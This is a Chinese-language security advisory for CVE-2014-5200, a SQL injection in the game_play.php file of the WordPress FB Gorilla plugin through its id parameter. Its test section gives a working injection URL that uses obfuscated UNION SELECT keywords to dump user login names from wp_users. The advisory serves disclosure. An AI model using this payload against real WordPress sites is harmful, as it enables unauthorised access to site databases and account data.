WordPress FB Gorilla插件'game_play.php' SQL注入漏洞


发布日期:2014-07-28
更新日期:2014-08-14

受影响系统:
WordPress FB Gorilla
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 69222
 CVE(CAN) ID: CVE-2014-5200
 
WordPress FB Gorilla插件是一个自动化系统,可以在fanpages上发布内容。
 
FB Gorilla plugin for WordPress中,game_play.php没有有效过滤用户输入,在实现上存在SQL注入漏洞,远程攻击者利用此漏洞通过id参数,可执行任意SQL命令。
 
<*来源:Amirh03in
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://fbgorilla.net/fb-gorilla-review/
 
本文永久更新链接地址:

相关内容